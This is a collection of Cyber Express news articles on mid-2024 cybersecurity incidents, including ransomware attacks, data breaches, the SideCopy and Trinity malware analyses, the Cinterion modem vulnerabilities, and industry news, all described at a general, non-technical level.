Cybersecurity expert Greg Gogolin from Ferris State University noted in response to the incident, that school districts are common targets for ransomware attacks due to inadequate preventive measures and limited cybersecurity staff. Gogolin highlighted that the end of the school year is a particularly vulnerable time for such attacks, as the urgency to resolve the situation increases with grades due and other academic deadlines approaching. Affluent districts are particularly targeted due to attackers perceiving them as having more resources available. To mitigate such risks, Gogolin advises districts to invest in advanced email filtering while educating staff about phishing emails. Additionally, teachers and students should maintain backups of essential data, such as grades and assignments, outside of school networks. The return to the traditional schooling method following the Rockford Public Schools ransomware attack is reminiscent to an earlier incident affecting Cannes Hospital, which forced its staff to resort to pen-and-paper techniques to keep services running. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Josh Krueger, the Chief Information Security Officer at Project Hosts, Inc. has been appointed to the Federal Secure Cloud Advisory Committee (FSCAC). This prestigious committee plays a crucial role in advising the Federal Risk and Authorization Management Program (FedRAMP) on various aspects of cloud computing adoption and security. The FSCAC appointment recognizes Mr. Krueger's expertise and Project Hosts' ongoing efforts to support secure cloud-computing practices and compliance standards, benefiting users and providers of cloud services. The Federal Risk and Authorization Management Program (FedRAMP) is a government-wide compliance initiative in the United States that offers a standardized framework for security assessment, authorization, and continuous monitoring of cloud products and services.

FSCAC Appointment Includes New Chair and Three Members

Along with Josh Krueger's appointment, Lawrence Hale, the deputy assistant commissioner within the Office of Information Technology Category Management for GSA's Federal Acquisition Service, will serve as the new chair of the FSCAC. In this capacity, Hale will act as a liaison and spokesperson for the committee's work products, in addition to his oversight responsibilities. Josh Krueger, and Kayla Underkoffler, the lead security technologist of HackerOne, will fill the vacant seats. Krueger's term will run through July 9, 2026, while Underkoffler's term will end on May 14, 2025. Carlton Harris, the senior vice president of End to End Solutions, has been appointed as the third new member of the FSCAC, with a three-year term ending on May 14, 2027. While not among the recent appointees, Michael Vacirca, a senior engineering manager at Google, has been reappointed to the federal panel for a full three-year term after serving for one year. His term will conclude on May 14, 2027. As an appointed Representative Member of the FSCAC, Mr. Josh Krueger is expected to bring unique perspectives towards the delivery of FedRAMP's Compliance-as-a-Service solutions. The role at the committee will involve representing the needs and viewpoints of businesses both small and large in the cloud-computing industry, and ensuring their interests are considered in the federal discussions and strategies around cloud adoption.

Responsibilities of the Federal Secure Cloud Advisory Committee

The FSCAC was formed by the General Services Administration in February 2023, in compliance with the FedRAMP Authorization Act of 2022, which is part of the National Defense Authorization Act for fiscal year 2023. The committee's primary responsibilities include advising and providing recommendations to the GSA Administrator, the FedRAMP Board, and various agencies on technical, financial, programmatic, and operational matters related to the secure and effective adoption of cloud computing products and services across different sectors. The committee also plays a significant role in examining the operations of FedRAMP, seeking ways to continually improve authorization processes, and collecting information and feedback on agency compliance with the implementation of FedRAMP requirements. Additionally, the FSCAC serves as a forum for communication and collaboration among all stakeholders within the FedRAMP community. The FSCAC will hold an open meeting on May 20th to discuss its next priorities, which are expected to further enhance the security and adoption of cloud computing solutions across the federal government. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

GhostSec, a threat actor group previously involved in financially motivated cybercrimes, announced a significant shift in their focus to depart from the cybercrime and ransomware operations to their original hacktivist aims. The announcement detailing GhostSec returns to hacktivism roots, would mark a notable change in the group's priorities and operational strategies, leading several to speculate that the stated departure comes after recent law enforcement efforts against international ransomware groups. The GhostSec group identifies itself as part of the Anonymous collective and is known to have been active in their operations since 2015. The group used hashtags such as #GhostSec or #GhostSecurity to promote their activities. The group was previously involved in the #OpISIS, #OpNigeria, and #OpIsrael campaigns.

GhostSec Will Transfer Existing Ransomware Clients to Stormous

In an announcement made on its Telegram channel, the GhostSec group stated that they had gathered sufficient funds from their ransomware operations to support other activities moving forward. Rather than completely abandoning their previous work, this transition includes transferring existing clients to the new Stormous locker by Stormous, a partner organization to whom they will also share the source code of the V3 Ghostlocker ransomware strain. [caption id="attachment_68783" align="alignnone" width="483"] Source: GhostSec Telegram Channel[/caption] They claim that these efforts will ensure a smooth transition to Stormous' services, while avoiding the exit scams or disruption risks typically associated with ransomware exits. Stormous will also take over GhostSec's associates within the Five Families collective, which previously consisted of GhostSec, ThreatSec, Stormous, BlackForums, and SiegedSec. While GhostSec will halt some of its earlier services, the group intends to maintain its private channel and chat room. The group announced a discount offer starting today and lasting until May 23rd for lifetime access to its private channel and chat room, reducing the price from $400 to $250. The group also suggested the possibility of offering a hacking course, although they are still debating the details.

GhostSec Returns to Hacktivism

The announcement expressed GhostSec's intentions to focus solely on hacktivism, a form of activism that employs hacking to promote social or politically driven agendas. GhostSec had a record of intense hacktivist operations and campaigns such as their successful efforts back in 2015 to taken down hundreds of ISIS-associated websites or social media accounts, reportedly halting potential terrorist attacks. The group used social media hashtags like #GhostSec, #GhostSecurity, or #OpISIS to promote their activities and participate in hacktivist initiatives against the terrorist group. GhostSec also promoted a project ("New Blood") to assist newcomers in picking up hacking skills to participate in their campaigns and provided resources to assist activists in anonymizing their identities such as WeFreeInternet, a project that sought to offer free VPN facilities to Iranian activists. The group had stated its intent to expand the project to support activists in similar circumstances who found their internet to be restricted by the governments worldwide. The official GhostSec Telegram channel where the announcement took place had been created on October 25, 2020, and the group is known to utilize its social media handles on various websites to promote its activities. It is important to note that the group's decision to depart from the cybercrime scene does not necessarily imply a shift towards more ethical practices. Furthermore, the group's involvement in financially motivated cybercrimes raises questions about their true motivations and the potential for their hacktivism to be used for personal gain or dubious political agenda rather than genuine social change. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Santander, one of the largest banks in the eurozone, confirmed that an unauthorized party had gained access to a database containing customer and employee information. The Banco Santander data breach is stated to stem from the database of a third-party provider and limited to the only some of the bank's customers in specific regions where it operated, as well as some of its current and former employees. However, the bank's own operations and systems are reportedly unaffected. Banco Santander is a banking services provider founded on March 21, 1857 and headquartered in Madrid, Spain. The provider operates across Europe, North America, and South America. It's services include global payments services, online bank and digital assets.

Customer and Employee Data Compromised in Santander Data Breach

The bank reported that upon becoming aware of the data breach, it had immediately implemented measures to contain the incident, such as blocking access to its database from the compromised source as well as establishing additional fraud prevention mechanisms to protect impacted customers and affected parties. After conducting an investigation, the bank had determined that the leaked information stemmed from a thid-party database and consisted of details of customers from Santander Chile, Spain and Uruguay regions along with some data on some current and former Santander employees. Despite the third-party database breach, customer data from Santander markets and businesses operating in different regions were not affected. [caption id="attachment_68444" align="alignnone" width="2422"] Source: santander.com[/caption] The bank apologized for the incident and acknowledged concerns arising from the data breach, taking action to directly notify the affected customers and employees. The security team also informed regulators and law enforcement of the incident details, stating that the bank would continue to work with them during the investigation. Santander assured its customers that no transactional data, nor transaction-facilitating credentials such as banking details and passwords were contained in the database. The statement reported that neither the bank's operations nor systems were affected, and that customers could continue with secure transaction operations. Along with the official statement in response to the data breach, the bank had provided additional advice on its site on dealing with the data breach:

• Santander will never ask you for codes, OTPs or passwords.
• Always verify information your receive and contact us through official bank channels.
• If you receive any suspicious message, email or SMS report it to your bank directly or by contacting reportphishing@gruposantander.com.
• Never access your online banking via links from suspicious emails or unsolicited emails.
• Never ignore security notifications or alerts from Santander related to your accounts.

Financial and Banking Sector Hit By Data Breaches

Increased cyber threats or third-party database exposure as in the Santander data breach pose serious concerns for stability within the financial and banking. The International Monetary Fund noted in a blog post last months that these incidents could erode confidence in the financial system, disrupt critical services, or cause spillovers to other institutions. In March, the European Central Bank instructed banks within the European region to implement stronger measures in anticipation of cyber attacks. Earlier, the body had stated that it would conduct a  resilience stest on at least 109 of its directly supervised banks in 2024. The initiatives come as part of broader concern about the security of European banks. Last year, data from the Deutsche Bank AG, Commerzbank AG and ING Groep NV were compromised after the CL0P ransomware group had exploited a security vulnerability in the MOVEit file transfer tool. The European Central Bank's site states that its banking supervisors rely on the stress tests to gather information on and assess how well the banks would able to cope, respond to and recover from a cyberattack, rather than just their ability to prevent attacks. The response and recovery assessments are described to include the activation of emergency procedures and contingency plans as well as the restoration of usual operations. The site states that these test results would then be used to aid supervisors in identifying weaknesses to be discussed in dialogue with the banks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cyble Research and Intelligence Labs (CRIL) researchers have uncovered a new SideCopy campaign. The threat actor group has previously been observed targeting South Asian nations with a particular focus on government and military targets in India and Afghanistan. Active since May 2023, the campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents. Ultimately, the campaign deploys malware payloads such as Reverse RAT and Action RAT, granting attackers extensive control over infected devices. The research explores the tactics employed by SideCopy, such as their recent focus on university students, and potential overlap in activities with the Transparent Tribe APT group.

Technical Analysis of the SideCopy Campaign Infection Chain

In early May, CRIL identified a malicious domain employed by the SideCopy group in their operations. The website was discovered hosting a ZIP archive file named "files.zip" that contained sub-directories labeled as "economy," "it," and "survey." The survey directory included files similar to those previously employed by SideCopy in their earlier campaigns. [caption id="attachment_68383" align="alignnone" width="1228"] Source: Cyble[/caption] The campaign likely employs spam emails to distribute the malicious ZIP archive hosted through the compromised website as the initial infection vector. These archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." Upon execution, the LNK files trigger a series of commands that proceeds to download and execute a malicious HTA file. The downloaded HTA files contain embedded payloads within additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics to appear legitimate to the targeted demographic. [caption id="attachment_68384" align="alignnone" width="604"] Source: Cyble Blog[/caption] [caption id="attachment_68385" align="alignnone" width="894"] Source: Cyble Blog[/caption] The malware is crafted with the functionality to adopt to the presence of different antivirus software such as Avast, Kaspersky and Bitdefender, which further amplifies its ability to evade detection and ensure persistence by placing the LNK shortcut files in the startup folder. The attack process ultimately leads to the deployment of malicious payloads such as Reverse RAT and Action RAT on to the victim system, which then connect to a remote Command-and-Control (C&C) server to commence malicious activities.

Intersection with Transparent Tribe Activities

The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at a possible collaborative efforts or shared objectives between the two groups with researchers previously noting that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate tactics of the Sidewinder APT group in the distribute of malware files, such as the use of disguised LNK files to initiate a complex chain of infections. CRIL researchers have advised the use of strong email filtering systems, exercise of caution, the deployment of network-level monitoring and the disabling of scripting languages such as PowerShell, MSHTA, cmd.exe to prevent against this potential threat. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Millions of Internet of Things (IoT) devices present across the industrial, healthcare, automotive, financial, and telecommunication sectors are at significant risk due to several vulnerabilities in a widely-used cellular modem technology. These Cinterion Modem Vulnerabilities, found in modems manufactured by Telit Cinterion, pose severe threats to device integrity and network security. Telit Cinterion, is an Internet of Things (IoT) technology provider company headquartered in Irvine, California, United States. It provides various edge-to-cloud IoT services such as connectivity plans, IoT SIMs, IoT embedded software and PaaS IoT deployment managed services. The newly discovered vulnerabilities pose significant risks to communication networks and IoT devices, potentially leading to extensive global disruption.

 Several Cinterion Modem Vulnerabilities Discovered

The findings by Kaspersky researchers were first presented at the OffensiveCon international security conference held recently in Berlin. The findings disclosed the identification of several critical vulnerabilities in Cinterion modems integrated into a wide range of IoT devices. These vulnerabilities include remote code execution (RCE) and unauthorized privilege escalation flaws that exist in user applications (MIDlets) and the OEM-bundled firmware integrated with the modems. The most severe vulnerability, CVE-2023-47610, is a memory heap overflow that allows attackers to remotely execute arbitrary commands through specially crafted SMS messages on affected devices, without requiring further authentication or any physical access. This vulnerability can also unlock access to special AT commands, enabling attackers to read and write to the modem's RAM and flash memory. The researchers demonstrated its existence by developing their own SMS-based File System, which they installed on the modem by exploiting the identified vulnerability. This allowed the researchers to then remotely activate OTA (Over The Air Provisioning) to install arbitrary MIDlets, that were protected from removal by standard mechanisms, and required a full reflash of the firmware for removal. In addition to the RCE vulnerability, researchers also identified several security issues in user applications called MIDlets and the OEM-bundled firmware of the modems. These vulnerabilities, assigned CVE-2023-47611 through CVE-2023-47616, could potentially allow attackers with physical access to the modem to compromise the confidentiality and integrity of user MIDlets, execute unauthorized code, extract and substitute digital signatures, and elevate execution privileges of user MIDlets to the manufacturer level. The researchers reported these vulnerabilities to Telit Cinterion last November and while the company has issued patches for some of the flaws, not all of them have been addressed, leaving millions of devices still at risk. The modems are embedded in various IoT products, including industrial equipment, smart meters, telematics systems, and medical devices, making it challenging to compile a comprehensive list of affected products. To mitigate potential threats, organizations are advised to disable non-essential SMS messaging capabilities, employ private Access Point Names (APNs), control physical access to devices, and conduct regular security audits and updates.

Rising Concerns Over IoT Security

The discovery of these vulnerabilities highlights a growing concern over the security of IoT environments, especially in industrial control and operational technology settings. An analysis of 2023 threat data by Nozomi Networks noted a significant increase in attacks targeting IoT and OT networks, driven by a rise in IoT vulnerabilities. Previous incidents, such as the 9 vulnerabilities found in industrial routers by Robustel R1510, indicate that routers remain a common point of weakness in networks with vulnerabilities such as remote code execution or DDoS flaws that may then be used to potentially spread attacks across connected devices. In conclusion, these vulnerabilities in Cinterion modems necessitate urgent action from both device manufacturers and telecom operators to mitigate risks and protect essential infrastructure. The researchers behind the findings plan to publish a white paper on modem security internals within May 2024, following findings from this study. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Just days before its highly anticipated spring art auctions, Christie's, the renowned auction house, had fallen victim to a cyberattack, taking its website offline and raising concerns about the security of client data. The Christie's auction house cyberattack has sent shockwaves through the art world, with collectors, advisers, and dealers scrambling to adapt to the sudden disruption. Christie's is a British auction house founded in 1766 by James Christie, offering around 350 different auctions annually in over 80 categories, such as decorative and fine arts, jewelry, photographs, collectibles, and wine. The auction house has a global presence in 46 countries, with 10 salerooms worldwide, including London, New York, Paris, Geneva, Amsterdam, Hong Kong, and Shanghai. The company provided a temporary webpage after its official website was taken down and later notified that the auctions would proceed despite the setbacks caused by the cyberattack.

Christie’s Auction House Cyberattack Occurs Ahead of Major Auctions

[caption id="attachment_68140" align="alignnone" width="1000"] Source: Shutterstock[/caption] The cyberattack came at an inopportune time for Christie's, with several high-stakes auctions estimated at around $850 million in worth scheduled to take place in New York and Geneva. Art adviser Todd Levin highlighted the significance of the timing, expressing concern that the cyberattack was happening during a pivotal moment before the spring sales when buyers confirm their interest in artworks. He raised a pressing question: "How can potential bidders access the catalog?" The auctions will include works by Warhol, Basquiat, and Claude Monet, and pieces from the Rosa de la Cruz Collection, that are expected to generate hundreds of millions of dollars in revenue. Christie's website was taken offline following the hack which affected some of its systems. Despite the setback, Christie's has assured clients that the auctions will proceed as planned, with bidders able to participate in person, by phone, or through Christie's Live platform. Despite the hack, Christie's CEO Guillaume Cerutti assured clients that all eight live auctions in New York and Geneva would proceed as scheduled, with the exception of the Rare Watches sale, which was postponed to May 14th. In a statement, Cerutti elaborated: "I want to assure you that we are managing this incident according to our well-established protocols and practices, with the support of additional experts. This included, among other things, the proactive protection of our main website by taking it offline."

Growing Cybersecurity Concerns in the Art World

The incident is a sobering reminder of the increasing threat of cyberattacks in the art world. In recent years, several museums and art market platforms have fallen victim to hacking, highlighting the need for vigilance in protecting sensitive client information amidst slumbering sales. Earlier in January, a service provider managing the online collections of several prominent museums had been targeted, affecting institutions like The Museum of Fine Arts in Boston, the Rubin Museum of Art in New York, and the Crystal Bridges Museum of American Art. Last year in 2023, Christie's had another security incident come to light when it was discovered inadvertently exposing the GPS location and co-ordinates of several art pieces purchased by some of the world’s biggest and wealthiest collectors, revealing their exact whereabouts.  In 2017, hackers employed an email scam to intercept payments between dealers and clients, siphoning sums ranging from £10,000 to £1 million. These incidents underscore the art world's vulnerability to similar threats as the market becomes increasingly digital, auction houses and museums must take proactive steps to to invest in stronger defenses against a rapidly evolving cyber threat landscape and the risks it may pose to the art industry. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An unidentified threat actor known as "pwns3c" has offered access to a database purported to contain sensitive data and documents from a City of New York data breach for sale on BreachForums. The City of New York website offers official digital representation of the city's government as well as access to related information such as alerts, 311 services, news, programs or events with the city. The claims made in the post, despite its alleged nature raises significant concerns about the extent of the data breach as well as the security practices followed by the government office.

Alleged City of New York Data Breach Claimed to Include Sensitive Data

The stolen database is allegedly stated to include 199 PDF files, approximately 70MB in size in total. The exposed data includes a wide range of personally identifiable information (PII), such as: Licensee Serial Number, Expiration Date, Applicant or Licensee Name, Trade Name, Street Address, City, Zip Code, Phone Number of Applicant, and Business Email of Applicant. Moreover, the data also reveals sensitive details about building owners, attorneys, and individuals, including their EIN, SSN, and signature. The threat actor is selling this sensitive information for a mere $30, and interested buyers are instructed to contact them through private messages within BreachForums or through their Telegram handle. The post seemingly includes links to download samples of the data allegedly stolen in the attack. [caption id="attachment_68084" align="alignnone" width="1872"] Source: BreachForums[/caption] The alleged data breach has far-reaching implications, as it puts the personal information of numerous individuals at risk. The leak of personally identifiable information (PII) and sensitive documents exposes individuals to potential risks of identity theft, fraud, and other malicious activities. The Cyber Express team has reached out to the New York City mayor's official press contact email for confirmation. However, no response has been received as of yet.

pwns3c Earlier Claimed to have Hacked Virginia Department of Elections

In an earlier post on BreachForums, pwns3c claimed an alleged data breach against the Virginia Department of Elections, compromising of at least 6,500 records. The earlier stolen data was also offered for USD 30 in Bitcoin (BTC), Litecoin (LTC), or Monero (XMR) on the dark web. The Virginia Department of Elections is responsible for providing and overseeing open and secure elections for the citizens of the Commonwealth of Virginia. It is responsible for voter registration, absentee voting, ballot access for candidates, campaign finance disclosure and voting equipment certification in coordination with about 133 of Virginia's local election offices. The compromised data was allegedly stated to have included sensitive information such as timestamps, usernames, election data, candidate information, and voting method details. However, there has been no official confirmation of the stated incident as of yet. The breaches claimed by pwns3c, despite their alleged nature highlight the persistent challenges of securing the websites of government institutions. The sensitive nature of the stolen data that may allegedly include Social Security Numbers (SSNs), contact information, election-related details, and signatures, underscores the urgency for government websites to strengthen their security measures. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Cybersecurity researchers at Cyble's Research and Intelligence Labs (CRIL) have uncovered a new ransomware variant called Trinity, which employs a double extortion strategy and has potential links to the previously identified Venus ransomware. This article explores the findings about the Trinity ransomware strain as well as the noted similarities between the Trinity and Venus ransomware strains.

Uncovering Tactical and Technical Details of Trinity Ransomware

CRIL researchers observed a new ransomware variant called Trinity, that employs common double extortion tactics such as exfiltrating data from victim's systems before encrypting them, and the intent to use both a support and leak site in their operations. The support site allows victims to upload sample files less than 2MB in size for decryption, while the leak site though currently empty, threatens to expose victim data. [caption id="attachment_68024" align="alignnone" width="940"] Source: Cyble Blog[/caption] Upon initial stages of the investigation, researchers observed similarities between the Trinity ransomware and the 2023Lock ransomware which has been active since early 2024. The deep similarities between the two variants such as identical ransom notes, and code suggest that Trinity might be a newer variant of the 2023Lock ransomware. Researchers noted an intricate execution process in the ransomware's operations such as a search for a ransom note within its binary file and immediately terminates if the file is unavailable. The ransomware collects system information such as the processor count, the pool of threads, and existing drives to prepare its multi-threaded encryption process. The ransomware then attempts privilege escalation by impersonating a legitimate process's token for its own usage, enabling the ransomware to bypass security measures. The ransomware deploys network enumeration activity along with lateral movement, demonstrating broad attack capability. [caption id="attachment_68025" align="alignnone" width="547"] Source: Cyble Blog[/caption] The Trinity variant employs the ChaCha20 algorithm to encrypt of victim files. After encryption, filenames are appended with “.trinitylock,” while ransom notes are left in both text and .hta formats in. The ransomware also modifies the desktop wallpaper to the ransomware note and uses a specific registry key to facilitate this change.

Similarities Between Trinity Ransomware and Venus Ransomware

The connections between Trinity and Venus go beyond mere similarities in their ransom notes and registry usage. Venus, an established ransomware operation with a global reach, emerged around mid-2022. The similarities between Venus and Trinity extend to their usage of identical registry values and consistency in their mutex naming conventions and code base. Additionally, the ransom notes used by both ransomware variants exhibit a similar format. The shared tactics and techniques indicate a possible collaboration between the two groups. This collaboration could lead to the exchange of techniques, tools, and infrastructure, amplifying the scale and sophistication of future ransomware campaigns. CRIL researchers have advised organizations to stay vigilant and implement robust cybersecurity measures to protect against these evolving threats. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

This week on TCE Cyberwatch we’re covering the different data breaches and vulnerabilities faced by different companies. Along with this, the rise of countries using AI and deepfake technology, some consensual and some not, adds depth to the conversation surrounding the security of it all. TCE Cyberwatch aims to bring updates around large-scale and small-scale events to ensure our readers stay updated and stay in the know of cybersecurity news that can impact them. Keep reading to learn about what’s currently trending in the industry.

Dropbox Sign data breached; Customers authentication information Stolen

Dropbox, a popular drive and file sharing service, revealed that they had recently faced a security breach which led to sensitive information being endangered. Specifically, Dropbox Sign, a service used to sign documents, was targeted. The data stolen was of Dropbox Sign users, which had information such as passwords, account settings, names, emails, and other authentication information. Rotation and generation of OAuth tokens and API keys are steps that have been taken by Dropbox to control fallout. Dropbox has assured that “from a technical perspective, Dropbox Sign’s infrastructure is largely separate from other Dropbox services. That said, we thoroughly investigated this risk and believe that this incident was isolated to Dropbox Sign infrastructure, and did not impact any other Dropbox products.” Read More

Cyberattacks on organizations in the UAE claimed by Five Families Alliance member, Stormous Ransomware

Stormous Ransomware has claimed responsibility for cyberattacks that have attacked several UAE entities. A ransomware group linked to the Five Families alliance which is known for targeting the UAE entities, Stormous Ransomware has targeted organisations like the Federal Authority for Nuclear Regulation (FANR); Kids.ae, the government’s digital platform for children; the Telecommunications and Digital Regulatory Authority (TDRA), and more. After announcing alleged responsibility for the attacks, the ransomware group demanded 150 BTCs, which comes to around $6.7 million USD. They had threatened to leak stolen data if the ransom was not paid. The organisations targeted by the group are yet to speak up about the situation and tensions are high due to the insurmountable damage these claims could cause. Read More

Russian bitcoin cybercriminal pleads guilty in the U.S. after arrest in France

Alexander Vinnik, a Russian cybercrime suspect, recently pleaded partially guilty to charges in the U.S. Previously arrested in Greece in 2017 on charges of money laundering of $4 billion through the digital currency bitcoin in France, Vinnik is now set to face a trial in California. Vinnik’s lawyer, Arkady Bukh, predicted that Vinnik could get a prison term of less than 10 years due to the plea bargain. The U.S. Department of Justice accused Vinnik of having "allegedly owned, operated, and administrated BTC-e, a significant cybercrime and online money laundering entity that allowed its users to trade in bitcoin with high levels of anonymity and developed a customer base heavily reliant on criminal activity." Read More

Many Android apps on Google Play store now have vulnerabilities that infiltrate them

Popular Android applications have faced a path traversal-affiliated vulnerability. Called the Dirty Stream attack, it can be exploited by one of these flagged applications leading to overwriting files. The Microsoft Threat Intelligence team stated that, “the implications of this vulnerability pattern include arbitrary code execution and token theft, depending on an application's implementation.” The apps who have faced this vulnerability are popular, with 500 million to 1 billion downloads. Exploitation would have led to the attacker having control of the app and being able to access the user’s data, like accounts used. Microsoft is worried about it being a bigger issue and has asked developers to focus on security to protect sensitive information. Read More

Department of Social Welfare, Ladakh, in India, allegedly hacked, but no proof provided

Recently, a threat actor had allegedly hacked the database of the Department of Social Welfare Ladakh, Government of India. Their claims, however, seemed to have no support. No information was disclosed from their side and no breaching of sorts was sensed on the department’s website. However, if the claims are true, the fallout is predicted to be very damaging. Investigations into the claims are currently happening. As no motive or even the authenticity has been confirmed, for the individuals whose data resides in the departments database and national security, it’s important to detect and respond in a swift manner as to preserve the nation’s cyber security. Read More

U.K. military data breach endangers information of current, veteran military personnel

The U.K. military faced a data breach where the information of serving UK military personnel was obtained. The attack was of Ministry of Defence’s payroll system and so information like names and bank details, sometimes addresses, were gathered. The hacker behind it was unknown until now but the Ministry has taken immediate action. The "personal HMRC-style information" of members in the Royal Navy, Army and Royal Air Force was targeted, some current and some past. The Ministry of Defence is currently providing support for the personnel whose information was exfiltrated, and this also requires informing veterans’ organisations. Defence Secretary Grant Shapps is expected to announce a "multi-point plan” when he updates the MPs on the attack. Read More

India’s current election sees deepfakes, Prime Minister Modi calls for arrests of political parties responsible

India’s current Prime Minister Modi has announced that fake videos of him and other leaders making “statements that we have never even thought of”, have been circulating. This election, with its new name of being India’s first AI election, has led to police investigations of opposition parties who have made these videos with Modi calling for arrests. Prior to this, investigations regarding fake videos of Bollywood actors criticising Modi were also taking place. However, in this situation, around nine people have been arrested - six of whom are members of Congress’ social media teams. Five of them have managed to be released on bail, but arrests of higher-ranking social media members have been made. There has been a trending tag #ReleaseArunReddy for Congress national social media co-ordinator, Arun Reddy, who had shared the fake videos.

Germany and Poland accuse Russian Military Service of cyber-attacks

Germany has come out stating that an attack on their Social Democratic Party last year was done by a threat group believed to be linked to Russian Military Services. German Foreign Minister Annalena Baerbock said at a news conference in Australia that APT28, a threat group also known as Fancy Bear, has been “unambiguously” confirmed to have been behind the cyberattack. Additionally, Poland has joined in support of Germany and said that they were targeted by ATP28 too. Poland has not revealed any details about the attack they faced but Germany shares that they are working to rebuild damage faced by it. Baerbock stated that, “it was a state-sponsored Russian cyber-attack on Germany, and this is absolutely intolerable and unacceptable and will have consequences.”

Ukraine unveils new AI-generated foreign ministry spokesperson

Ukraine has just revealed an AI spokesperson who has been generated to deliver official statements for the foreign ministry. The messages being delivered are written by humans, but the AI is set to deliver them, moving animatedly and presenting herself as an individual through introducing herself as Victoria Shi. Victoria is modelled based on a Ukrainian celebrity, Rosalie Nombre, who took part in her development and helped to model the AIs appearance and voice after her. Ukraine’s foreign minister has said that she was developed for “saving time and resources,” along with it being a “technological leap that no diplomatic service in the world has yet made.” Read More

Singapore passes new amendment to their cybersecurity bill which regulates temporary, high-risk attacks

A new amendment to Singapore’s Cybersecurity Law was made by its Parliament to keep up with the country’s evolving critical infrastructure and to adapt to technological advancements. The changes made regulate the Systems of Temporary Cybersecurity Concern (STCC), which encompass systems most vulnerable to attacks in a limited period. This means the Cyber Security Agency of Singapore (CSA) can oversee Entities of Special Cybersecurity Interest (ESCIs), due to their error disposition affecting the nation’s security as a whole. With the country’s defence, public health and safety, foreign relations, and economy in danger, the Bill is set to target critical national systems only, leaving businesses and such as they are. Read More

Eurovision becomes susceptible to cyberattacks as the world’s largest music competition takes place during conflict

The 68th Eurovision Song Contest is being held in Sweden, Malmö, this year due to current tensions surrounding conflicts like Israel and Gaza, and Russia and Ukraine. Security has been tightened as in 2019, hackers had infiltrated the online stream of the semi-finals in Israel by warning a missile strike and showed images of attacks in Tel Aviv, the host city. There are several reports about hackers hijacking the broadcast as over 167 million people tuned in to watch last year. The voting system can also be an issue with the finals coming up, but Malmö’s police chief claims to be more worried about disinformation. The spokesperson for the contest stated that “We are working closely with SVT's security team and the relevant authorities and expert partners to ensure we have the appropriate measures in place to protect from such risks.” Read More

Wrap Up

This week we’ve seen militaries and governments being cyber-attacked and that truly reminds us how interconnected everything is. If big organisations are vulnerable to attacks, then so are we. TCE Cyberwatch hopes that everyone stays vigilant in the current climate of increased cyberattack risks and ensure they stay protected and are on the lookout for any threats which could affect them. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Treacle, a cybersecurity startup founded in 2021 by Subhasis Mukhopadhyay, Subhajit Manna, and Partha Das, has raised about 40 million in its pre-Series A funding round. This milestone achievement underscores the company's rapid growth and recognition within the industry. Founded by three seasoned entrepreneurs, Treacle has been deliberate in its mission to develop cutting-edge cybersecurity solutions that safeguard businesses from the ever-evolving threat landscape. With this latest injection of capital, the company plans to expand its product offerings, enhance its research and development capabilities, and further solidify its presence in the market. The pre-seed funding round, which marks a significant milestone for the startup, is expected to propel Treacle's growth trajectory. The company's founders express belief that this influx of capital will enable them to further accelerate goals. The funding was led by prominent investors who have shown a keen interest in Treacle's approach to tackling modern digital threats.

Treacle Offers Defensive Cyber Security Solutions

Treacle serves both private and government sectors with solutions developed through rigorous research. Subhasis Mukhopadhyay stated, “Our mission centers on safeguarding network infrastructures through early detection, containment, and deception of threats. We're committed to delivering unparalleled value in the market, ensuring our clients have access to premium security solutions affordably. Our goal is to establish ourselves as a market leader and create a safer cyber world within the next five to six years. The standout product of Treacle is the AI-Based Proactive Defense System with in-built Deception. This service is designed to protect businesses even if their firewalls and defense layers have been breached. It works by tracking and analyzing attacker behavior in the early stages, then luring the attacker into a complex, containerized mirage network. This strategy not only keeps other systems safe but also allows the gathering of important data about the threat, which is used to provide early warnings to SOC analysts, helping to prevent an attack before it takes place. Treacle also offers a range of other services, including Customized Honeypot Solutions, Network and Host-Based Intrusion Detection Systems, Insider Threat Detection Systems, and OT Network Security Systems. Additionally, the company can conduct thorough Cyber Security Audits and help design effective security policies. Vikram Ramasubramanian, Partner at Inflection Point Ventures, highlighted Treacle's core strengths in AI-Based Deception Technology, a cornerstone of their Defensive Cyber Security solutions. The company plans to introduce new features and enhancements that will further strengthen its security offerings and provide even greater value to its clients.

Company Growth and Achievements

